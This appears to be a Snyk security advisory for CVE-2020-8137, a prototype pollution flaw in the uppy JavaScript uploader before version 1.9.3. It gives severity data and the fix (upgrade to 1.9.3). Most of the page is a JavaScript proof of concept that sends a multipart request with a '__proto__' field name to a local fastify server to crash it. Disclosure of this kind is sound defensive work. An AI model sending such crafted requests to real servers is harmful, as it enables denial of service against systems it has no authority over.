Prototype Pollution Affecting uppy package, versions <1.9.3
Snyk CVSS
Attack Complexity
Low
Confidentiality
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.6% (79th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-UPPY-559068
- published 28 Feb 2020
- disclosed 28 Feb 2020
- credit Eran Hammer, Matteo Collin
Introduced: 28 Feb 2020
CVE-2020-8137 Open this link in a new tabHow to fix?
Upgrade uppy to version 1.9.3 or higher.
Overview
uppy is a sleek, modular JavaScript file uploader that integrates seamlessly with any application.
Affected versions of this package are vulnerable to Prototype Pollution. It is possible to crash a remote server parsing multipart requests by sending a specially crafted request
PoC
const http = require('http')
const fastify = require('fastify')()
const options = {
addToBody: true,
onFile: (fieldName, stream, filename, encoding, mimetype, body) => {
stream.resume();
}
};
fastify.register(require('fastify-multipart'), options);
fastify.post('/', function (req, reply) {
console.log(req.body.toString());
reply.code(200).send();
});
fastify.listen(3000, () => {
console.log(`server listening on ${fastify.server.address().port}`)
const body =
'--AaB03x\r\n' +
'content-disposition: form-data; name="__proto__"; filename="file1.txt"\r\n' +
'Content-Type: text/plain\r\n' +
'\r\n' +
'... contents of file1.txt ...\r\r\n' +
'--AaB03x--\r\n';
const r = {
hostname: 'localhost',
port: 3000,
path: '/',
method: 'POST',
headers: {
'content-type': 'multipart/form-data; boundary=AaB03x'
}
};
const req = http.request(r, (res) => { });
req.write(body);
req.end();
});